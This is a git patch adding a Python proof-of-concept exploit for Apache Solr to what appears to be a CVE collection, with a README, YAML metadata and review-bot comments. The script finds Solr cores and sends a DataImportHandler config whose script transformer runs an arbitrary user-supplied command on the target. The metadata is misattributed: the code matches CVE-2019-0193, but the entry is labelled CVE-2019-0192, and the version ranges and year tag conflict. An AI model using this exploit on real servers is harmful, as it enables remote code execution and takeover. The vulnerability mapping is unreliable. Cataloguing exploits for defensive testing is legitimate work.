From 616a48e6f509061b37614f0ea52b510a2f1acfbf Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Mon, 27 Mar 2023 13:08:35 +0000 Subject: [PATCH 1/2] CVE-2019-0192 Signed-off-by: MaJiahao --- .../2019/CVE-2019-0192/CVE-2019-0192.py | 57 +++++++++++++++++++ cve/apache-solr/2019/CVE-2019-0192/README.md | 10 ++++ cve/apache-solr/2019/yaml/CVE-2019-0192.yaml | 20 +++++++ 3 files changed, 87 insertions(+) create mode 100644 cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py create mode 100644 cve/apache-solr/2019/CVE-2019-0192/README.md create mode 100644 cve/apache-solr/2019/yaml/CVE-2019-0192.yaml diff --git a/cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py b/cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py new file mode 100644 index 00000000..7a8f6cbb --- /dev/null +++ b/cve/apache-solr/2019/CVE-2019-0192/CVE-2019-0192.py 
@@ -0,0 +1,57 @@ +import requests +import json +import sys + + +banner = ''' + ____ _ ____ ____ _____ +/ ___| ___ | |_ __| _ \ / ___| ____| +\___ \ / _ \| | '__| |_) | | | _| + ___) | (_) | | | | _ <| |___| |___ +|____/ \___/|_|_| |_| \_ \____|_____| + +CVE-2019-0193 (Rapid SafeGuard) +''' +print (banner) + +def findcores(url, cmd): + core_selector_url = url + '/solr/admin/cores?_=1565526689592&indexInfo=false&wt=json' + r = requests.get(url=core_selector_url) + json_strs = json.loads(r.text) + if r.status_code ==200 and "responseHeader" in r.text: + print ("\nHere Have %s Core_name Exit!\n" % str(len(json_strs['status']))) + for core_selector in json_strs['status']: + coreselector = json_strs['status']['%s'%core_selector]['name'] + print ('\n>>>>The Core Name = %s' % coreselector) + proofofconcept(url,coreselector,cmd) + + else: + print "No core_selector Exit!" + + +def proofofconcept(url,coreselector,cmd): + debug_model_url = url + '/solr/'+ coreselector +'/dataimport?_=1565530241159&indent=on&wt=json' + payload = "command=full-import&verbose=false&clean=true&commit=true&debug=true&core=atom&dataConfig=%%3CdataConfig%%3E%%0A++%%3CdataSource+type%%3D%%22URLDataSource%%22%%2F%%3E%%0A++%%3Cscript%%3E%%3C!%%5BCDATA%%5B%%0A++++++++++function+poc()%%7B+java.lang.Runtime.getRuntime().exec(%%22%s%%22)%%3B%%0A++++++++++%%7D%%0A++%%5D%%5D%%3E%%3C%%2Fscript%%3E%%0A++%%3Cdocument%%3E%%0A++++%%3Centity+name%%3D%%22stackoverflow%%22%%0A++++++++++++url%%3D%%22https%%3A%%2F%%2Fstackoverflow.com%%2Ffeeds%%2Ftag%%2Fsolr%%22%%0A++++++++++++processor%%3D%%22XPathEntityProcessor%%22%%0A++++++++++++forEach%%3D%%22%%2Ffeed%%22%%0A++++++++++++transformer%%3D%%22script%%3Apoc%%22+%%2F%%3E%%0A++%%3C%%2Fdocument%%3E%%0A%%3C%%2FdataConfig%%3E&name=dataimport" % cmd + headers = { + "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3", + 
"Accept-Encoding":"gzip, deflate", + "Content-type":"application/x-www-form-urlencoded", + "X-Requested-With":"XMLHttpRequest", + "Referer":"http://%s/solr/" % url + + } + r3 = requests.post(url = debug_model_url, data=payload,headers=headers) + print ">>>>> debug_model_url= %s" % debug_model_url + if r3.status_code ==200 and 'Requests' in r3.text: + print ("Exploit Done! Happy Hacking") + else: + print ("No Send Poc Success!") + + + +if __name__ == '__main__': + url = raw_input("Enter IP and Port with http") + cmd = raw_input("Enter command") + findcores(url,cmd) diff --git a/cve/apache-solr/2019/CVE-2019-0192/README.md b/cve/apache-solr/2019/CVE-2019-0192/README.md new file mode 100644 index 00000000..5ccf46b6 --- /dev/null +++ b/cve/apache-solr/2019/CVE-2019-0192/README.md @@ -0,0 +1,10 @@ +# Solr-RCE-CVE-2019-0192 +Apache Solr remote code execution via dataImportHandler + +### Target Solr version: 1.3 – 8.2 +Requirements: DataImportHandler should be enabled, which is not by default. I have tested on version 6.2 + +### python +python solr_RCE.py + + diff --git a/cve/apache-solr/2019/yaml/CVE-2019-0192.yaml b/cve/apache-solr/2019/yaml/CVE-2019-0192.yaml new file mode 100644 index 00000000..b071b64e --- /dev/null +++ b/cve/apache-solr/2019/yaml/CVE-2019-0192.yaml 
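Review bot: The script is filed under CVE-2019-0192 but its own banner reads `CVE-2019-0193 (Rapid SafeGuard)` and the request it builds targets the DataImportHandler `dataConfig` script transformer, whereas the yaml added in this same patch describes CVE-2019-0192 as the ConfigAPI/JMX RMI deserialization issue (CWE-502); the PoC appears to be misattributed, and the README's "via dataImportHandler" and "Target Solr version: 1.3 – 8.2" carry the same mismatch against the yaml's 5.0.0–6.6.5 range. A defender using this corpus to map an identifier to an affected component or version would be misled, so the directory name, `id` and `cve-id` should be reconciled with what the code actually exercises before the entry is published. Separately, the file mixes Python 2 and Python 3 syntax: `print "No core_selector Exit!"`, `print ">>>>> debug_model_url= %s" % debug_model_url` and `raw_input(...)` are Python 2 only, so the module fails to parse under Python 3 even though the other calls are written as `print (...)`. `json.loads(r.text)` in `findcores` also runs before the `r.status_code ==200` check, so a non-JSON response raises instead of reaching the `else` branch.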
@@ -0,0 +1,20 @@ +id: CVE-2019-0192 +source: https://github.com/Rapidsafeguard/Solr-RCE-CVE-2019-0192 +info: + name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。 + severity: critical + description: + CVE-2019-0192漏洞本质是ConfigAPI允许通过HTTP POST请求配置Solr的JMX服务器。攻击者可以通过ConfigAPI将其配置指向恶意RMI服务器,利用Solr的不安全反序列化来触发Solr端上的远程代码执行。 + scope-of-influence: + Apache Solr 5.0.0 to 5.5.5, 6.0.0 to 6.6.5 + reference: + - https://github.com/mpgn/CVE-2019-0192 + - https://nvd.nist.gov/vuln/detail/CVE-2019-0192 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2019-0192 + cwe-id: CWE-502 + cnvd-id: None + kve-id: None + tags: cve2021, Apache, Solr, RCE -- Gitee From b74a789850c4652edb0a7ebeaa257b5d7e0925e0 Mon Sep 17 00:00:00 2001 From: MaJiahao Date: Mon, 27 Mar 2023 13:09:58 +0000 Subject: [PATCH 2/2] update openkylin_list.yaml. Signed-off-by: MaJiahao --- openkylin_list.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/openkylin_list.yaml b/openkylin_list.yaml index 34ec4afd..ca0c0e0e 100644 --- a/openkylin_list.yaml +++ b/openkylin_list.yaml @@ -17,6 +17,7 @@ cve: - CVE-2021-44228 apache-solr: - CVE-2021-27905 + - CVE-2019-0192 apache-tomcat: - CVE-2022-29885 - CVE-2020-9484 -- Gitee
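Review bot: `tags: cve2021, Apache, Solr, RCE` contradicts `id: CVE-2019-0192` and `cve-id: CVE-2019-0192` in the same file; the year tag should be `cve2019` so tag-based filtering of this corpus groups the entry with the correct year. `cnvd-id: None` and `kve-id: None` are read by YAML as the string "None" rather than a null value, which is not how an absent identifier is normally represented; use `null` or drop the keys unless consumers rely on the literal string. The `scope-of-influence` range `Apache Solr 5.0.0 to 5.5.5, 6.0.0 to 6.6.5` also disagrees with the README's `1.3 – 8.2` added in this patch, so one of the two should be corrected.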